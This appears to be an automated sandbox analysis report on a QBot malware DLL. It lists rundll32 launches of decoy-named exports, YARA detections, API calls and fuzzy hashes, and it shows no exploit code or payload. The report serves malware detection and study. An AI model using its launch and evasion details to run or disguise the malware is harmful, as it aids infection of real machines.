                                                                                                                                                                                                                                                                          Start time:01:04:46
                                                                                                                                                                                                                                                                          Start date:07/06/2023
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:rundll32.exe "C:\Users\user\Desktop\042_qbot.dll.dll",ldiv_round_up
                                                                                                                                                                                                                                                                          Imagebase:0x20000
                                                                                                                                                                                                                                                                          File size:61952 bytes
                                                                                                                                                                                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                          Target ID:15
                                                                                                                                                                                                                                                                          Start time:01:04:46
                                                                                                                                                                                                                                                                          Start date:07/06/2023
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:rundll32.exe "C:\Users\user\Desktop\042_qbot.dll.dll",next
                                                                                                                                                                                                                                                                          Imagebase:0x20000
                                                                                                                                                                                                                                                                          File size:61952 bytes
                                                                                                                                                                                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000000F.00000002.393595991.00000000045F0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000000F.00000002.393475523.000000000296A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                                                                                                                                                                          Target ID:16
                                                                                                                                                                                                                                                                          Start time:01:04:46
                                                                                                                                                                                                                                                                          Start date:07/06/2023
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:rundll32.exe "C:\Users\user\Desktop\042_qbot.dll.dll",lround_up
                                                                                                                                                                                                                                                                          Imagebase:0x20000
                                                                                                                                                                                                                                                                          File size:61952 bytes
                                                                                                                                                                                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                          Target ID:17
                                                                                                                                                                                                                                                                          Start time:01:04:46
                                                                                                                                                                                                                                                                          Start date:07/06/2023
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:rundll32.exe "C:\Users\user\Desktop\042_qbot.dll.dll",lpeg_write_tables
                                                                                                                                                                                                                                                                          Imagebase:0x20000
                                                                                                                                                                                                                                                                          File size:61952 bytes
                                                                                                                                                                                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                          Target ID:20
                                                                                                                                                                                                                                                                          Start time:01:04:47
                                                                                                                                                                                                                                                                          Start date:07/06/2023
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7048 -s 652
                                                                                                                                                                                                                                                                          Imagebase:0xe20000
                                                                                                                                                                                                                                                                          File size:434592 bytes
                                                                                                                                                                                                                                                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                          Target ID:21
                                                                                                                                                                                                                                                                          Start time:01:04:47
                                                                                                                                                                                                                                                                          Start date:07/06/2023
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5796 -s 660
                                                                                                                                                                                                                                                                          Imagebase:0xe20000
                                                                                                                                                                                                                                                                          File size:434592 bytes
                                                                                                                                                                                                                                                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                          Target ID:22
                                                                                                                                                                                                                                                                          Start time:01:04:51
                                                                                                                                                                                                                                                                          Start date:07/06/2023
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\wermgr.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\wermgr.exe
                                                                                                                                                                                                                                                                          Imagebase:0x9a0000
                                                                                                                                                                                                                                                                          File size:191904 bytes
                                                                                                                                                                                                                                                                          MD5 hash:CCF15E662ED5CE77B5FF1A7AAE305233
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                          Reset < >
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.388087273.000000006AD81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6AD80000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388079594.000000006AD80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388180901.000000006ADF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388188460.000000006ADF4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388195375.000000006ADF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388195375.000000006ADFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_6ad80000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressHandleModuleProc$LibraryLoad
                                                                                                                                                                                                                                                                            • String ID: _Jv_RegisterClasses$__register_frame_info$libgcc_s_dw2-1.dll$libgcj-13.dll
                                                                                                                                                                                                                                                                            • API String ID: 652391981-159345992
                                                                                                                                                                                                                                                                            • Opcode ID: 174b7f510952e3c1a7d92b62687ddb2c84a904ca156fc8ec012c0c85c4e93b87
                                                                                                                                                                                                                                                                            • Instruction ID: d675804f6bb312547546230e90a1c997c02a84e616a9ee9daeb6eabfd02d7456
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 174b7f510952e3c1a7d92b62687ddb2c84a904ca156fc8ec012c0c85c4e93b87
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B00161F1904200ABEB007F78964675E7EF8AF05212F83452CE896C7304EE34E958DBA3
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.388087273.000000006AD81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6AD80000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388079594.000000006AD80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388180901.000000006ADF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388188460.000000006ADF4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388195375.000000006ADF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388195375.000000006ADFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_6ad80000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalExceptionFilterProcessSectionUnhandled$CurrentEnterErrorLastLeaveTerminateValueabort
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2989179798-0
                                                                                                                                                                                                                                                                            • Opcode ID: 9065017ed5234fb123e44d6708054de625382f9d5a539402cf28e2b5284c4d17
                                                                                                                                                                                                                                                                            • Instruction ID: f99962f86f4e8b76b4a3158b28e751bbda0fe3d772afa358b4769054948631d1
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9065017ed5234fb123e44d6708054de625382f9d5a539402cf28e2b5284c4d17
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BB2146F1944244CFEF00AFA9E68954A7BF4AB06305F424569DD89CB304EB34A9588FA3
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetSystemTimeAsFileTime.KERNEL32 ref: 6ADC52F7
                                                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 6ADC5308
                                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6ADC5312
                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 6ADC531A
                                                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32 ref: 6ADC532B
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.388087273.000000006AD81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6AD80000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388079594.000000006AD80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388180901.000000006ADF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388188460.000000006ADF4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388195375.000000006ADF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388195375.000000006ADFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_6ad80000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1445889803-0
                                                                                                                                                                                                                                                                            • Opcode ID: 15bf34995bc2e6ba5b4e109c97f67aa5a0ff947541128098c1ae30e2d0d30fa0
                                                                                                                                                                                                                                                                            • Instruction ID: 698e9afb54e5ee92a4174f6037402d37887ea11ce9714d7ecb95810e9d252d71
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 15bf34995bc2e6ba5b4e109c97f67aa5a0ff947541128098c1ae30e2d0d30fa0
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D711F6B5848300CFEB109F29D54411EBBF5BB8A344F86492DE986E7310EB35EA458F82
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.388087273.000000006AD81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6AD80000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388079594.000000006AD80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388180901.000000006ADF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388188460.000000006ADF4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388195375.000000006ADF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388195375.000000006ADFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_6ad80000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 766fee892abcdd184b753aabadc84f9169730b4caa204f54eb7b665d7fab028d
                                                                                                                                                                                                                                                                            • Instruction ID: df671b935b9de51f34eab4ecbecfcee19f022cede73c8c02bb2254cf0852d286
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 766fee892abcdd184b753aabadc84f9169730b4caa204f54eb7b665d7fab028d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 13027071908712CBC324DF29C48056BF7F1FF98701F068A2EE9D99B691E774A504CB96
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.388087273.000000006AD81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6AD80000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388079594.000000006AD80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388180901.000000006ADF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388188460.000000006ADF4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388195375.000000006ADF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388195375.000000006ADFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_6ad80000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 7cb29f4f83f96f10b57247a4e245e378bcbca1f01bb03e96992d4c139055477f
                                                                                                                                                                                                                                                                            • Instruction ID: 08164c3520fe84e7db1f8187aa699682728efeeda4d098d6e27e086dc2b2d681
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7cb29f4f83f96f10b57247a4e245e378bcbca1f01bb03e96992d4c139055477f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 13C190729087159BC328CF28C58022BF7E1FF95705F068A6EE9C58B2A1E735E905CB81
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.388087273.000000006AD81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6AD80000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388079594.000000006AD80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388180901.000000006ADF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388188460.000000006ADF4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388195375.000000006ADF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388195375.000000006ADFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_6ad80000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 689124f1c0e529a35433716c60f009670efef5b3d9363f5ef2cc53f24d38dee5
                                                                                                                                                                                                                                                                            • Instruction ID: 6d9ecd41a777639d658862e96072335231d6a508fac0deba82a59c9c78467849
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 689124f1c0e529a35433716c60f009670efef5b3d9363f5ef2cc53f24d38dee5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 06F065C6B5450347F356416F0D90793558B97C0724F73C438A81BD3B50E975C845B110
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.388087273.000000006AD81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6AD80000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388079594.000000006AD80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388180901.000000006ADF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388188460.000000006ADF4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388195375.000000006ADF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388195375.000000006ADFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_6ad80000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: ac5fa32d7461fe5cca9e8ed7ed895995d4191905422ce670572497a3d28479bd
                                                                                                                                                                                                                                                                            • Instruction ID: d21f0b0c9f83078936a90973a99dff4a706cf9a84358e083aeb105e761798b8b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ac5fa32d7461fe5cca9e8ed7ed895995d4191905422ce670572497a3d28479bd
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4F0A9F0A88108EFC768CF5DC890D9977B4AB0A318F4240D4E4A5AB761EB32ED40CB54
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ldiv_round_up.042_QBOT.DLL ref: 6ADA036D
                                                                                                                                                                                                                                                                            • ldiv_round_up.042_QBOT.DLL ref: 6ADA038A
                                                                                                                                                                                                                                                                            • ldiv_round_up.042_QBOT.DLL ref: 6ADA03B4
                                                                                                                                                                                                                                                                            • ldiv_round_up.042_QBOT.DLL ref: 6ADA03CA
                                                                                                                                                                                                                                                                            • ldiv_round_up.042_QBOT.DLL ref: 6ADA0503
                                                                                                                                                                                                                                                                            • ldiv_round_up.042_QBOT.DLL ref: 6ADA0526
                                                                                                                                                                                                                                                                            • ldiv_round_up.042_QBOT.DLL ref: 6ADA05E4
                                                                                                                                                                                                                                                                            • ldiv_round_up.042_QBOT.DLL ref: 6ADA05FC
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.388087273.000000006AD81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6AD80000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388079594.000000006AD80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388180901.000000006ADF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388188460.000000006ADF4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388195375.000000006ADF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388195375.000000006ADFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_6ad80000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ldiv_round_up.042_
                                                                                                                                                                                                                                                                            • String ID: T
                                                                                                                                                                                                                                                                            • API String ID: 1846932333-3187964512
                                                                                                                                                                                                                                                                            • Opcode ID: a071a4c00f19c7b7ce4da8639aea14776ed4875d2a2e861e419adeeca33db29a
                                                                                                                                                                                                                                                                            • Instruction ID: e2670bf71c81c8e112190d1212c2ed54c202870f1b43dee4de2f03395455d403
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a071a4c00f19c7b7ce4da8639aea14776ed4875d2a2e861e419adeeca33db29a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2A2204B0A05B05DFD724CF28C18875EBBE0BB89748F02892DD6C58B741EB75E948CB91
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.388087273.000000006AD81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6AD80000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388079594.000000006AD80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388153798.000000006ADEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388180901.000000006ADF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388188460.000000006ADF4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388195375.000000006ADF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.388195375.000000006ADFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_6ad80000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: QueryVirtual$abortfwritememcpyvfprintf
                                                                                                                                                                                                                                                                            • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$@$Address %p has no image-section
                                                                                                                                                                                                                                                                            • API String ID: 3828011698-1098444051
                                                                                                                                                                                                                                                                            • Opcode ID: aaccc6ae1bd24cfccfa11b99ed98473f56a72907cd53e24bfdfe633ba1a4be32
                                                                                                                                                                                                                                                                            • Instruction ID: 863c7aacf0a316b51e3d97c23f2c3647a93b2d5072d4370d178310ae1a9909d3
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aaccc6ae1bd24cfccfa11b99ed98473f56a72907cd53e24bfdfe633ba1a4be32
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1D71C8B49093019FD700DF29D18861ABBF4BB89758F82895DE489C7311EB34E984CB93
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • lpeg_calc_output_dimensions.042_QBOT.DLL ref: 6ADA0A94
                                                                                                                                                                                                                                                                              • Part of subcall function 6ADA0270: ldiv_round_up.042_QBOT.DLL ref: 6ADA036D
                                                                                                                                                                                                                                                                              • Part of subcall function 6ADA0270: ldiv_round_up.042_QBOT.DLL ref: 6ADA038A
                                                                                                                                                                                                                                                                            • linit_1pass_quantizer.042_QBOT.DLL ref: 6ADA0C52
